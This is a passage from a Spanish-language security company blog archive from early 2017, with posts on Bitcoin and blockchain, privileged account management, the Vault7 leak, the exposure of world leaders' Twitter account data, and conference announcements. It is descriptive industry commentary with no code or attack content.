uso de los servicios de Cloudflare se apresuraron a notificar a sus usuarios tan pronto como tuvieron conocimiento del incidente y, como medida preventiva, recomendaron el cambio de tokens de autenticación y contraseñas de forma inmediata. Nuevamente, se pone de manifiesto las dificultades que entraña la delimitación del perímetro tecnológico de una organización cuando este implica a proveedores de terceras compañías. En este caso, tenemos que considerar la realidad de las dificultades que existen a la hora de cuantificar la cantidad de información que se puede haber visto afectada, por lo que, aunque las posibilidades sean remotas, nunca está de más ser especialmente precavidos. Si está de tocar la lotería, que no sea esta. Luis Miguel García Intelligence Analyst at ElevenPaths
15 de marzo de 2017
Blockchain (III). Bitcoin. La criptomoneda precursora que abrió la caja de Pandora
Blockchain hubiera quedado en un cajón como una propuesta más si no hubiese venido con una interesante alianza que le da sentido y razón. Una propuesta que se puso sobre la mesa con el mensaje más claro, motivador e inspirador posible. ¿Estamos hablando de su modelo seguro? No. ¿De su versatilidad? Tampoco, ni mucho menos de su robustez. Sino de obviamente el objetivo de ganar mucho dinero y además de manera algo más encubierta… especular con él. Y cuando hay dinero entre manos, muchos interesados acuden raudos para saber cómo conseguirlo. Basta como ejemplo observar la siguiente figura donde podemos ver la evolución del bitcoin (BTC) y la onza de oro (XAU) los últimos seis meses. Donde el día 3 de marzo el bitcoin superó por fin el valor del oro. BTC y XAU frente al euro. A alimentar la maquinaria de bitcoin ayudaron anécdotas como la compra de pizzas por 10.000 BTC en el 2010, algo que equivalía a 33€ del momento. Hoy, principios de 2017,el coste sería de más de 12 millones de euros. Casi nadie predijo el ascenso meteórico que iba a tener el bitcoin en aquellos comienzos. Más de un especulador se arrepentirá, haciendo un pequeño ejercicio de retrospección, de sus trámites y movimientos de bitcoins del pasado. Quién hubiera sido capaz de prever que existiría un mecanismo de pago que permitiría el intercambio de dinero en cualquier parte del mundo, sin intermediarios, con un grado de seguridad tan elevado, robusto y lejos de la zona de influencia e intereses bancarios. Y es que no hay más que ver la volatilidad de esta moneda y sus múltiples revalorizaciones y devaluaciones para entender que no está supeditada a ningún control ni regulación. Y cualquier circunstancia económica internacional, noticia o rumor, puede suponer un tremendo revulsivo tanto positivo como negativo al valor de las criptomonedas. Autogestión del dinero ¿Qué locura es esta? En este mundo el dinero siempre ha sido gestionado por los bancos. ¿Quién no se fía de los bancos? Unas entidades que participan en el intrincado sistema del mercado que tiene en circulación muchísimas divisas además de un mercado afectado por la coyuntura social de las sedes bancarias y de determinadas decisiones políticas que puede influenciar el precio del dinero. Inflación, devaluación, impuestos, tasas, comisiones, burbujas económicas, corralitos, evasión fiscal, etc. Demasiados parámetros que pueden provocar crisis y penurias en el mercado global. En las criptomonedas el único factor que afecta al proceso es la compra y venta de monedas, la oferta y la demanda. Básicamente si por algún interés social mucha gente desea comprar moneda virtual el precio subirá, y ocurrirá lo contrario si todo el mundo desea cobrar los beneficios de la venta de criptomonedas. Lo que incentiva la definición más básica y fundamental de la especulación. El mercado de bitcoin viene predeterminado tanto en masa como en inflación. Ningún factor externo puede modificar dichos parámetros. Existe un límite de 21 millones de bitcoins que pueden ser obtenidos. Donde la tasa de descubrimiento viene afectada por una función matemática predefinida. Esto quiere decir que el ritmo al que se pueden ir encontrando bitcoins viene determinado por una función, diseñada para corregir el aumento de las capacidades de cálculo de los ordenadores a lo largo del tiempo, para que cada vez resulte más complejo añadir nuevos bitcoins a la circulación. Aunque hay que matizar que la granularidad del BTC se establece en satoshis. Donde 1 BTC= 100.000.000 satoshis. Como es lógico a mayor número de bitcoins mayor aumento de la inflación, algo que a día de hoy apenas ha afectado a la moneda gracias a que dicha inflación se ha visto retenida por el gigantesco crecimiento y adopción de la criptomoneda y su constante revalorización. La propia demanda ha rectificado e invertido la tendencia inflacionista. Aun así, existe un factor de corrección donde la remuneracón de bitcoins es reducida a la mitad cada cuatro años (hasta hace poco, julio de 2016, cada bloque se validaba a 25 bitcoins, mientras que hoy en día se crean 12,5 por cada bloque minado). El incipiente auge de tecnologías basadas en blockchain ha despertado el interés de inversores que perciben este proceso tan sofisticado de expansión económica, más allá de las criptomonedas. Fondos de capital-riesgo, inversores, bussiness angels y demás agentes interesados se apresuran en tener un trozo del suculento pastel de blockchain. Grandes compañías han puesto el foco en start-ups que aportan una visión fresca e innovadora. Incluso los bancos han cambiado su enfoque, dándose cuenta de que deben subirse a un tren tecnológico antes de que sea muy tarde. Ninguna entidad financiera espera que las criptodivisas acaben eclipsando a SWIFT (Society for Worldwide Interbank), p ero más vale ser precavidos al respecto. Dichas entidades financieras apuestan tanto a título individual como colectivo con la esperanza de no perder su presencia en el mercado financiero global. Encajando piezas A partir de aquí debemos alejarnos de nuestro ejemplo didáctico para poder comprender el funcionamiento real de bitcoin. Para ello hay que visualizar los tres actores que intervienen en la malla: Los usuarios que realizan exclusivamente operaciones de transferencias de bitcoins. Los mineros que confirman transacciones de BTCs, realizando un esfuerzo computacional para conseguirlo, bien sea para hallar nuevos bloques del blockchain o bien para verificar que otros mineros los han encontrado antes. Por tanto, además de ampliar el blockchain mantienen una copia. Los nodos que ayudan a la verificación de nuevos bloques creados que aún no han sido confirmados. Para ello almacenan una copia del blockchain en su cliente. Y por otro lado necesitamos conocer algunos elementos adicionales para soportar el funcionamiento y la topología del ecosistema: La cartera de BTCs es como su propio nombre indicar es espacio virtual protegido con las credenciales del usuario donde cada individuo "almacena" sus bitcoins. Las carteras de los clientes son accedidas vía clientes software, pero debido a la importancia de estos monederos, han surgido distintas soluciones para proteger las carteras de los usuarios, como dispositivos hardware seguros, smartphones, etc. Los pools o grupos de minería son las grandes granjas de ordenadores dedicados a la minería de bloques, que pueden ser centralizados o distribuidos, y realizan la función de incorporar nuevos bloques al blockchain. Debido al enorme esfuerzo que se necesita hoy día para lograr encontrar nuevos bloques, los empeños individuales (que pueden prolongarse años) apenas benefician a los usuarios y solo a través de estas grandes agrupaciones se consigue sostener el funcionamiento del bitcoin. Sin olvidar los incentivos y premios que reciben los pools, compensando el esfuerzo y dedicación. Dichos beneficios se reparten proporcionalmente entre sus integrantes, lo que hace que muchos usuarios decidan adherirse a ellos. Por tanto, los usuarios de bitcoin usan sus carteras para realizar las transacciones y transferencias a través de sus clientes sin importarles el mecanismo interno del blockchain. Los nodos usan un tipo de cliente más avanzado y almacenan una copia del blockchain, ayudando a verificar la validez de los bloques creados y requiriendo muy poco esfuerzo criptográfico por su parte. Y finalmente los mineros, adscritos a pools de minería, son los encargados de crear nuevos bloques. Gracias a un proceso criptográfico complejo donde la obtención de cada nuevo bloque les proporciona, como mencionamos, 12,5 bitcoins hoy por hoy. A esto hay que sumar además la pequeña comisión por cada una de las transacciones que consigan aprobar dentro del bloque. La siguiente figura muestra un bloque encontrado por un minero o pool de minería anónimo cuya única transferencia es la comisión de 12,5 BTC. Podemos ver que este bloque ya ha sido aceptado por la comunidad (tiene 27 confirmaciones). Bloque de una única transacción de 12,5 BTCs Bitcoin sentó un antes y un después, precursora de un proceso de cambio económico que ha resistido los múltiples enemigos que se ha ganado. Hoy por hoy nadie duda del status logrado sino más bien del incierto paso que está tomando, donde la tasa de cambio alcanza un valor inimaginable años atrás. En la siguiente entrada ahondaremos en los aspectos más técnicos que son necesarios para comprender cómo bitcoin se ha montado sobre blockchain y por qué los engranajes de este modelo funcionan a la perfección. Marcos Arjona Innovación y laboratorio marcos.arjona@11paths.com *También te puede interesar: Blockchain (I): Más allá del Bitcoin, la Deep Web, el ransomware y la mala fama Blockchain (II). Un modelo distribuido fiable de seguridad. ¿La panacea?
13 de marzo de 2017
La importancia del control de las cuentas privilegiadas
El control de las cuentas privilegiadas debería ser una de las principales prácticas en el plan estratégico global de nuestra compañía. Tal vez haya empezado de una forma muy tajante, pero para ser conscientes de la importancia del control de los usuarios privilegiados, podríamos hacer referencia a Forrester Research, quien estima que el 80 % de los incidentes de seguridad implican el robo de credenciales privilegiadas; o el Ponemon Institute quien señala a los insiders como los principales culpables de los agujeros de seguridad y fuga de datos. Ya hemos visto la importancia del control de cuentas privilegiadas, pero ahora debemos asentar un concepto importante, ¿qué es exactamente una cuenta privilegiada? Me gusta aclarar este término, ya que, para mí, su amplitud se ha visto incrementada en los últimos años. Tendemos a asociarlas con cuentas como la de root o el administrador de Windows, cuentas con los permisos más elevados, pero no sólo debemos aplicar dicho concepto a los sistemas, ahora más que nunca, debemos atribuirlo a las aplicaciones. No sólo comprometer la cuenta root de un sistema puede generarnos daño, comprometer la cuenta twitter de la empresa tal vez pueda implicar mucho más. ¿Quién es más privilegiado? En los últimos años, siendo conscientes de la importancia del control de las cuentas privilegiadas y unido a las necesidades de los nuevos marcos normativos, han proliferado diferentes soluciones para el control de los mismos, en distintos formatos o para distintas necesidades. Somos conocedores de sus grandes capacidades, y por ello nos gustaría desglosaros las mismas en una serie de artículos, viendo los beneficios, casos de uso, y cómo podemos “vitaminarlas” añadiendo Latch. Ecosistema heterogéneo de cuentas privilegiadas Toda organización necesita controlar la operativa del acceso privilegiado de usuarios autorizados con riesgos de seguridad y operacionales. La naturaleza distribuida y heterogénea de tales cuentas privilegiadas las hace difíciles de manejar desde un enfoque único que satisfaga las necesidades de la organización, pudiendo agrupar y ver esa heterogeneidad en la clasificación de las cuentas privilegiadas, en tres grandes grupos a tener en cuenta en este control: Cuentas administrativas: Una cuenta de usuario personal (nominal) no genérica asignada a una función administrativa o que asume privilegios elevados en el proceso y por lo tanto tiene acceso a todas las operaciones estándar de usuario y privilegiadas. Cuentas de sistema: Están incorporadas en sistemas o aplicaciones, como root en sistemas Unix / Linux o Administrador en sistemas Windows. Cuentas operativas: este tipo de cuenta se divide en dos subcategorías y puede tener privilegios elevados: Cuentas compartidas configuradas para la administración y la instalación del software. Estas cuentas no se crearon para el uso exclusivo de un usuario en particular y pueden ser compartidas por varios usuarios. También pueden incluir cuentas de emergencia, a menudo conocidas como cuentas “Firecall”, usadas en caso de una emergencia que requiera acceso privilegiado temporalmente. Cuentas de servicio o cuentas de aplicaciones que se utilizan para permitir interacciones remotas, aplicación a aplicación (A2A) con otros sistemas o para ejecutar servicios del sistema. Figura 1: Heterogeneidad usuarios privilegiados Los distintos tipos de cuentas, las distintas formas de trabajar de las organizaciones y una multitud de factores a tener en cuenta, nos hace disponer de diferentes productos y metodologías para controlar las cuentas privilegiadas de una organización. Hoy nos centraremos en el control de las cuentas privilegiadas que hemos mencionado anteriormente, con un tipo de soluciones, que a mí personalmente me gustan mucho. Soluciones que abarcan un amplio abanico de control en cuentas privilegiadas en diferentes sistemas, sin necesidad de instalar nada en el sistema final. ¿Qué son las soluciones PAM? Incluso cuando los privilegios de los usuarios o las cuentas están justificados, no carecen de riesgos. Debemos desalentar a los administradores de usar cuentas privilegiadas para actividades mundanas, no administrativas, porque incluso cometer un simple error de escritura al ingresar un comando, puede causar graves problemas. Un mal control de las cuentas privilegiadas, deja a las organizaciones expuestas a brechas de seguridad e incumplimientos normativos, que pueden dar lugar a pérdidas de negocio y sanciones financieras. Las cuentas privilegiadas compartidas pueden ser indispensables, pero también suponen un riesgo significativo, y por ello, debemos tomar el control de la situación. Las soluciones PAM (Privileged Access Management) son un conjunto de tecnologías diseñadas para ayudar a las organizaciones a abordar los problemas inherentes relacionados con las cuentas privilegiadas. La combinación ideal de herramientas PAM varía para diferentes organizaciones dependiendo de una serie de requisitos de seguridad y operación. Conocemos muy bien los beneficios de las soluciones PAM y que casos de uso podéis necesitar (nosotros ya los hemos abordado), y por ello, os contaré todo en nuestro próximo post “Beneficios de las soluciones PAM y casos de uso”. Rubén Gª Ramiro Telefónica Cybersecurity Expert Ciberseguridad Blog
9 de marzo de 2017
Análisis, aclaraciones y primeras curiosidades sobre #Vault7
Wikileaks ha desvelado una mina de oro. El arsenal de ciberarmas que la CIA mantenía para sus operaciones de ataques en la red . Un evento tremendamente interesante por muchas razones. Veamos algunas de ellas y además, las primeras curiosidades sobre un análisis preliminar. Qué ha pasado Wikileaks ha publicado bajo el nombre de Vault7 buena parte del arsenal de armas y documentación del que dispone la CIA para, fundamentalmente, atacar a través de medios electrónicos. Un arsenal cibernético, no es más que un buen puñado de gigabytes con documentación y herramientas. Entre ellas, tendremos: Documentación pública más o menos ordenada sobre cómo realizar ciertas acciones. Documentación privada sobre cómo realizar ciertas acciones. Manuales de usuario y descripciones de herramientas y metodologías internas. Código de vulnerabilidades públicas. Código de vulnerabilidades privadas o mejoradas (0days). Entornos y frameworks de trabajo, ensayo y desarrollo. Y básicamente, dependiendo de hacia qué categoría bascule la cantidad de información, así se podrá evaluar la calidad del arsenal. Cuanto más privada la información, más importante resulta. Pero sobre todo, el número de 0days es un valor especialmente interesante. Se trata de las vulnerabilidades desconocidas para el público y la industria pero conocidas por la CIA, que permiten entrar y ejecutar código en los sistemas. Si la CIA dispone de un método desconocido para la mayoría (nunca se sabe si otro grupo de inteligencia lo conoce y lo está usando también), eso multiplica en varios órdenes de magnitud el valor del arsenal. Le permite, literalmente, controlar cualquier sistema con esa vulnerabilidad. ¿Cuántos 0days tiene el arsenal de la CIA? No lo sabemos todavía, hay mucho contenido oculto. Pero por los títulos podemos intuir algunos. Una muestra con la elevación de privilegios en Windows. Se intuyen técnicas todavía no reveladas de Local Privilege Escalation en Windows ¿Es sorprendente? La NSA ya sufrió un problema parecido el año pasado. Su arsenal se "subastó" literalmente. Disponían de lo mismo: herramientas propias, públicas, 0-days, vulnerabilidades. No nos debe sorprender que una agencia de inteligencia disponga de este arsenal, como cualquiera que se dedique a la "profesión". Solo que a una escala diferente. Disponen de información privada, conocimientos de vulnerabilidades que pueden poner en peligro no solo a los espiados, sino que en malas manos o mal usadas permitiría ejercer ese mismo poder sobre el resto de la población. Es lo que tiene la democratización de la tecnología: los espiados usan WhatsApp (aunque no los más espabilados), televisiones inteligentes, iPhones, Linux, Windows… igual que cualquier otro. Cuando la CIA dispone de un sistema para atacar alguna de estas tecnologías, un mal paso puede permitir que todo el mundo se convierta en víctima. Un debate que siempre está abierto sobre la privacidad, puertas traseras, responsabilidades, etc. Técnicamente, todavía no se conoce el alcance de los documentos filtrados. ¿Cuánta información conocida hay? Mucha. ¿Cuánta desconocida? Bastante, parece, pero no sabemos ni cuánto ni cómo. Wikileaks está dejando que sean los propios usuarios los que minen la información y saquen la mejor historia posible de todo este diamante en bruto. Premiarán con información privilegiada a los que demuestren habilidades para conseguirlo. Desde el punto de vista técnico, también es interesante un análisis que sin duda la comunidad y la industria pondrá en marcha. ¿Y los titulares sobre coches asesinos, Whatsapp y televisiones micrófono? Uno de los titulares sobre el dato encontrado Pues eso, titulares. Al parecer disponían de conocimiento único sobre cómo vulnerar todas estas tecnologías. Pero todavía está por ver si en connivencia con el fabricante, disponían de puertas traseras específicas para espiar. De lo contrario, lo que han hecho es "su trabajo": buscar vulnerabilidades… y no publicarlas para aprovecharse de ellas. Esto es cuestionable y debatible. Los "coches asesinos"… por ahora, parece que eso más bien lo ha aportado Wikipedia de su propia cosecha. En los documentos se observa que la CIA quería desde 2014 encontrar formas de infectar los sistemas de control de vehículos modernos. Wikileaks es la que habla de que potencialmente podría ser usado para realizar asesinatos selectivos y no detectables (no habría forense sobre un coche destrozado). Wikileaks es quien especula sobre el potencial uso de este conocimiento. Que una televisión se convierta en un micrófono ya se conoce (y se usa) desde 2013. Uno de los datos que (a título personal) más ha llamado la atención es que la CIA tenía totalmente interiorizado el proceso de aprendizaje por errores ajenos y propios. Esto se materializa en dos puntos fundamentales: Disponen de un documento donde apuntan y analizan los errores específicos de terceros a la hora de haber sido detectados o señalados con el dedo en el caso de alguna filtración u operación. No querían cometerlos de nuevo. Disponen de una base de datos de "fingerprints" de terceros para engañar y confundir durante un potencial proceso de atribución. Esto es especialmente interesante. Han recopilado la información sobre qué caracteriza a diferentes agencias de inteligencia, y no solo se preocupan de no dejar rastros propios, sino que los aplican deliberadamente a sus propias operaciones para confundir a los potenciales analistas. En otras palabras: cubrir huellas no solo borrándolas, sino intentando que parezcan las huellas digitales específicas de otro. Esto, junto con otras "anécdotas" ya conocidas sobre la atribución, convierte ya a este ejercicio en un verdadero circo en el que el recontra-espionaje invalida desde hace tiempo cualquier teoría. ¿Algunas curiosidades? Esto es solo un análisis muy muy preliminar. En Wikileaks han tenido mucho cuidado al publicar la primera parte de la información. Han mantenido en secreto buena parte, y eliminado los datos sensibles de otras. Algunos de los nombres ocultados Pero no de todas. Aunque no se sabe si a propósito, o si este dato es relevante para algo, al menos en una de las capturas no han eliminado el nombre de usuario desde donde se hace una prueba de "tracert" a una IP. DavidB. En este caso, deliberadamente o no, no han ocultado el nombre de usuario Tampoco de una imagen de un usuario del entorno de test de la CIA donde realiza una especie de "Hola Mundo". Su nombre es Keith... Ni han eliminado algunas MACs de los diagramas o códigos (algunas son falsas). Sergio de los Santos ssantos@11paths.com @ssantosv
8 de marzo de 2017
Todos somos objetivo del cibercrimen
Del 2 al 16 de febrero se celebró TIC Fórum Centroamérica, el evento donde Telefónica Business Solutions muestra cómo apoyan a las empresas en su migración digital, y en sus operaciones de negocio, a través de la implementación de la tecnología. Esta 6ª edición se celebró bajo el lema " Ciberseguridad: Protegiendo activos digitales". ElevenPaths, como unidad de Ciberseguridad de Telefónica, apoyamos dicho evento para concienciar a las organizaciones en Centroamérica de la necesidad de implementar medidas de seguridad. Así que tuve el honor de realizar la ponencia principal, donde mi objetivo era mostrarles a los asistentes cómo podían y estaban siendo usados por el cibercrimen y cómo esto les estaba afectando. Fue por esto que mi ponencia se llamó “ ¿A quién le interesaría atacarte? Todos somos objetivo del cibercrimen”, donde la idea era enseñar con ejemplos claros cómo los grandes mecanismos que usa la ciberdelincuencia les estaban afectando y cómo estaban siendo usados, en la mayoría de casos sin sospecharlo. Usando herramientas online mostramos cómo Panamá había sido atacado por DDoS durante el mes de diciembre de 2016. Ilustración 1. http://www.digitalattackmap.com/#anim=1&color=0&country=PA&list=2&time=17141&view=map Pero era importante no solo mostrar cómo eran usados o cómo eran atacados por el cibercrimen, sino también mostrar que esto se genera por errores en la gestión de la seguridad de la información en las empresas y la falta de concienciación de los usuarios. Uno de los ejemplos más claros de la falta de gestión en la ciberseguridad es que, tras 3 años divulgada una de las vulnerabilidad más críticas de la historia, como lo es HeartBleed, siguen más de 200.000 dispositivos vulnerables a este ataque, por lo que usando Shodan en cada país evidencia que en sus redes existen equipos con esta vulnerabilidad. Ilustración 2. Dispositivos detectados vulnerables a heartbleed en cada país Todos estos ejemplos prácticos estaban orientados a mejorar los niveles de concienciación y gobierno de la seguridad de la información en la región, pues según los estudios del Banco Interamericano de Desarrollo (BID) y la unidad de Ciberseguridad de la OEA, que como se puede ver en su informe en el 2016 evidencia que en todos los países visitados están en un estado inicial de las políticas y estrategia en ciberseguridad. Ilustración 3. http://observatoriociberseguridad.com/graph/countries/sv-gt-cr-ni-pa/selected/pa/0/dimensions/1-4 En resumen, el énfasis que se dio en la presentación era mostrar como cualquier tipo de organización puede ser víctima de la delincuencia cibernética, por lo que es necesario que se tomen medidas para calcular los riesgos a los que se ven expuestos y buscar más allá de las medidas tradicionales de seguridad, con las cuales es evidente que no se mitigan correctamente los riesgos. Es necesario que se utilice la inteligencia y el conocimiento colectivo que en asocio con un socio cuya principal razón de funcionamiento sea las comunicaciones, la digitalización y la seguridad, permitiendo así usar todo el conocimiento que se tiene en esta industria para mitigar de forma correcta los riesgos cibernéticos. Diego Samuel Espitia ElevenPaths Chief Security Ambassador @dsespitia
3 de marzo de 2017
¿Está seguro tu presidente en Twitter?
La red social Twitter se ha convertido en un canal habitual para muchos presidentes de gobierno y primeros ministros con el fin de comunicar en tiempo real sus pensamientos desde rincones del mundo que antes eran impensables. Sin embargo, ¿qué pasaría si sus cuentas fuesen comprometidas? Apenas hace un mes una ciberidentidad llamada WauchulaGhost se dirigió al presidente Trump publicando el siguiente mensaje: «Cambia tus ajustes de seguridad». Sin que se trate de una gran habilidad técnica, una simple recuperación de contraseñas en esta red social llegó a exponer parte de los correos utilizados por varios perfiles de la Casa Blanca sin que fuera muy complicado llegar a autocompletarlos. A raíz de ello, estas cuentas cambiaron la configuración de seguridad para evitar la exposición de la información con la que se dieron de alta en esta red social. Efectivamente: el presidente tenía una dirección de recuperación de correo asociada a una cuenta de Gmail. Y tu primer ministro, ¿expone también su información? El primer problema al que nos tuvimos que enfrentar en esta investigación fue a la búsqueda de los perfiles de Twitter de todos los presidentes de gobierno del mundo. De esta manera llegamos a identificar otra mala práctica: ¡al menos el 46% de los presidentes que tienen presencia en Twitter no tienen verificadas sus cuentas! La verificación de las cuentas de Twitter es útil para prevenir una potencial suplantación de identidad al indicar la propia plataforma a los usuarios que una cuenta ha pasado un proceso de verificación adicional. Figura 1. Porcentaje de presidentes que tiene sus cuentas verificadas frente a los que no las tienen. Una vez realizado el primer paso y tras revisar las configuraciones de seguridad de todos aquellos que utilizan esta red social, en la Figura 2 se puede ver en color rojo aquellos países cuyos jefes de gobierno exponen parte de su información de registro y en color verde aquellos que han modificado las opciones de seguridad para evitar mostrar más información de la deseada. En este sentido, al menos el 85% de los que tienen cuenta de Twitter sobreexponen un indicio de la cuenta con la que se realizó el proceso de alta en la plataforma. E Incluso, algunas de estas cuentas también muestran información del número de teléfono con el que vincularon su cuenta de Twitter. Figura 2. Presidentes de gobierno con al menos la dirección de correo expuesta. Por otro lado, si analizamos los servicios de correo electrónico que se han utilizado para registrar sus cuentas podemos ver cómo, de aquellos presidentes que sobreexponen información, al menos un 30% utilizan cuentas de Gmail. El uso de este tipo de servicios es considerado mala práctica ya que, como estamos viendo, Twitter no muestra ningún reparo en decírselo a todo aquel que realice una simple recuperación de contraseñas sobre un perfil determinado. Por otro lado, de la misma manera que se le criticó a Hillary Clinton por el uso de servicios de correo personales para su correspondencia en el gobierno, deberían usarse cuentas corporativas para el registro en las redes sociales con el fin de no sobreexponer de forma tan directa el uso de un determinado servicio cuyas condiciones de seguridad pueden no estar alineadas con los estándares de la organización. Figura 3. Perfiles con la geolocalización activada. Por último, analizando toda la información que devuelve Twitter sobre un perfil hemos podido observar otra mala práctica y más cuando estamos hablando de jefes de gobierno: ¡al menos el 39% de los perfiles analizados tienen habilitada la geolocalización! Tampoco es necesario ser el primero de la clase para saber que se podría tener cierta noción de su ubicación y de sus rutinas. No siempre la culpa es del usuario Si bien es cierto que muchos usuarios ni siquiera leemos la política de privacidad y de seguridad de Twitter, esta red social tampoco nos proporciona mucho margen para evitar cierta exposición de información. Tenemos claro que debemos evitar cualquier posible sobreexposición de información sin nuestro consentimiento y así evitaremos potenciales ataques. Para protegernos, debemos ir al apartado de Seguridad y habilitar la casilla Requerir información personal para recuperar mi contraseña. Figura 4. Cómo requerir información personal para recuperar la contraseña Sin embargo, habilitarla no solucionará del todo nuestro problema. Al solicitar el restablecimiento de contraseña de un usuario que tuviera habilitada esta opción, y sin llegar a notificar al propietario del perfil, se podrían hacer cuantas consultas se quisieran hasta validar la información utilizada para su registro llegando a tener así la certeza de que existe cierto vínculo entre una dirección de correo dada y ese usuario. De todas formas, cuanto más difícil lo pongamos, más potenciales ataques podremos evitar. Yaiza Rubio Intelligence Analyst at ElevenPaths @yrubiosec Félix Brezo Intelligence Analyst at ElevenPaths @febrezo
2 de marzo de 2017
Vive MWC 2017 y RootedCON con ElevenPaths
Como os anunciábamos en nuestro post sobre Eventos en marzo esta semana se celebran dos citas muy importantes en el mundo de la tecnología. Mobile World Congress 2017, que se celebra en Barcelona y es el referente para la industria móvil. El otro evento es RootedCON 2017, que se celebra en Madrid y es la conferencia que reúne a los expertos en ciberseguridad. Os traemos el detalle de cada una de ellas. Mobile World Congress 2017 El pasado domingo 26 de febrero era un momento histórico para Telefónica, nuestro presidente, José María Álvarez-Pallete, junto a Chema Alonso, CDO de Telefónica y Chairman de ElevenPaths, presentaron, la que habíamos denominado con nombre en código, Cuarta Plataforma. Un nuevo modelo de relación con nuestros clientes basado en inteligencia cognitiva pionero en el sector, que finalmente se ha llamado AURA. La implementación de capacidades cognitivas a nuestras plataformas permitirá a los clientes conocer, gestionar y controlar su vida digital con Telefónica y descubrir nuevas propuestas. Puedes encontrar más información en este post AURA: The heart of the 4th Platform. Ver los mejores momentos MWC 2017 en imágenes y seguir todos los anuncios más relevantes de Telefónica durante el congreso en la sección Notas de prensa de Telefónica relacionadas con MWC 2017. No te pierdas este vídeo en el que puedes ver cómo fue la presentación de AURA y descubrir más sobre ella. Si estás en el congreso no dudes visitar el stand de Telefónica situado en el Hall 3, Stand 3K21. También habrá numerosas ponencias de nuestros compañeros de Telefónica, como la que realizará este jueves 2 de marzo nuestro CEO, Pedro Pablo Pérez, sobre " Tendencias de la Identidad Digital". Además nuestro compañero Óscar Mancebo participa en el seminario Mobile Connect: how global brands are protecting consumers and reducing fraud, y también formará parte del panel The Future of Identity – Expert. RootedCON Quedan pocos días para que comience RootedCON, el congreso de seguridad informática que se celebrará en Madrid del 2 al 4 de marzo. En esta nueva edición ElevenPaths tendrá una buena representación en el evento contando con dos ponencias y dos talleres. Como no queremos que te lo pierdas, ¡sorteamos dos entradas! Toma nota, el viernes 3 de marzo a las 16:30 h Chema Alonso, CDO de Telefónica y Chairman de ElevenPaths, impartirá su ponencia " DirtyTooth: It´s only Rock'n Roll, but I like it". Otros de nuestros compañeros que participarán en el congreso es nuestro experto y CSA de ElevenPaths, Pablo San Emeterio, que impartirá la interesante ponencia " Inteligencia privada, más allá de STIX ", en la que hablará sobre el furor que está viviendo la compartición de IOCs y otros elementos de inteligencia, pero sin que haya unos estándares establecidos y con lo que puede suponer un exceso de información. Con este escenario de pros y contras podrás conocer más sobre este tema si asistes a esta intersante charla. Además, Pablo San Emeterio impartirá el taller " Hooking" con el que podrás introducirte y sentar bases en las distintas técnicas que se utilizan para modificar el comportamiento de aplicaciones y sistemas operativos mediante la interceptación de mensajes, llamadas a función y eventos. ¡Inscríbete ya! Nuestro compañero Pablo González participa un año más, impartiendo el taller " Metasploit para pentesters", un training orientado a la práctica del hacking, en el que podrás adentrarte en el mundo de Metasploit, el framework de explotación más utilizado en el mundo del pentesting. En el training se irá de menos a más hasta lograr sacar un gran rendimiento con técnicas más avanzadas que aportarán en tu pentest. ¡Inscríbete aquí! SORTEAMOS 2 ENTRADAS ¡Sorteamos dos entradas individuales para la RootedCON! Sí, has leído bien. Si quieres pasar unos días escuchando a grandes ponentes y aprendiendo en estos interesantes talleres y charlas, no dudes en participar en nuestro sorteo de entradas para la nueva edición de RootedCON. ¿Qué hay que hacer para participar y ganar? 1. Sigue a ElevenPaths en Twitter 2. Escribe este tuit » Quiero ir a la #rooted2017 con @ElevenPaths El concurso estará activo 24 horas desde el 28 de febrero a las 12:00 p.m. El ganador se elegirá el día 1 de Marzo 2016 de manera aleatoria y contactaremos con él vía mensaje directo de Twitter. ¡Mucha suerte y nos vemos en la RootedCON!
28 de febrero de 2017
Blockchain (II). Un modelo distribuido fiable de seguridad. ¿La panacea?
Supongamos por un instante que deseamos establecer una comparativa entre las características y mecanismos de seguridad actuales (habitualmente centralizados) y lo que blockchain (paradigma de modelo distribuido) podría aportarnos. Esto es tan ecuánime e imparcial como comparar la venta de productos en un comercio de barrio con los mecanismos de venta en un comercio online, o sea, resulta injusto. Porque blockchain no solo responde a un novedoso hito conceptual, sino que se ha visto altamente influenciado por los avances tecnológicos y una mayor idoneidad social y cultural en una comunidad mucho más abierta y capacitada. Pero aun así repasaremos estas diferencias. Comparativa Se puede comprobar por tanto que el enfoque Blockchain es distinto a los modelos de seguridad habituales, y durante mucho tiempo ha supuesto un reto conseguir que se considere su aplicación a las mismas situaciones y usos que el modelo tradicional. Tantas diferencias y sin embargo presumiblemente mucho más seguro… puede que que esa sea precisamente esa su mayor virtud. Comparativa. Hacer click para ampliar. Fortalezas A continuación, se presentan el resto de aspectos funcionales que permiten comprender cómo unas características tan distribuidas, sustentan una verificación y seguridad supuestamente tan sólida e inquebrantable. Para ello vamos a retomar el ejemplo de la primera entrada e introducir un nuevo tipo de individuo en la sala. Los Testigos. Estas personas no pueden imprimir nuevas hojas (crear bloques de datos) pero sí forman parte del equipo que decide si una hoja nueva se agrega o no a las anteriores. De esta manera no tienen que invertir tanto esfuerzo como los Operarios, pero sí guardan copias de la lista de hojas para contrastarlas con el resto. Disponibilidad Al ser una red distribuida, el hecho de que uno de los nodos caiga no afecta al conjunto total de la red P2P ya que la información replicada resuelve de manera instantánea este suceso. A diferencia de un modelo centralizado donde la caía del servidor impediría el acceso y uso del sistema. Además, mantener el histórico completo de operaciones garantiza que no se perderán datos en los futuros procesos de intercambio y distribución. Ante esto, podemos establecer que el modelo blockchain es capaz de resistir ataques de denegación de servicio (DoS) con lo que resultaría bastante inviable afectar al funcionamiento global de blockchain. En nuestro ejemplo de la primera entrada, hay que diferenciar entre los participantes que desean expresar sus comentarios de aquellos que quieren recogerlos y confirmarlos de manera impresa. Pero todos interactúan a través de comunicación persona a persona (P2P) con lo cual jerárquicamente están al mismo nivel. Si bien es cierto su rol funcional difiere entre ellos. Modelo distribuido en blockchain Inmutabilidad Los datos de las transacciones y las operaciones son imposibles de modificar una vez hayan sido incorporadas al blockchain. Podemos también entenderlo como acciones irreversibles e incorruptibles. No existe posibilidad alguna de modificar, alterar, falsear, rectificar o borrar ningún nodo de los que componen el histórico de operaciones que forman el blockchain. Tanto operarios como testigos poseen copias de todo el material que ha sido aceptado, por tanto, cualquier intento de alterar un dato del pasado es directamente rechazado (y criptográficamente imposible). Además, cada ampliación, al hacerse de manera consensuada impide que haya desviaciones respecto a la información incorporada a la cadena de datos. Cuanto más tiempo un bloque en el blockchain, más complejo modificarlo puesto que implicaría modificar criptográficamente todos los posteriores. Inmutabilidad del blockchain ¿Y cómo garantizamos esta inmutabilidad? Para ello tenemos que alejarnos un poco de nuestro ejemplo didáctico y bajar a un nivel algo más técnico donde en vez de imprimir comentarios en hojas, vamos a demostrar la 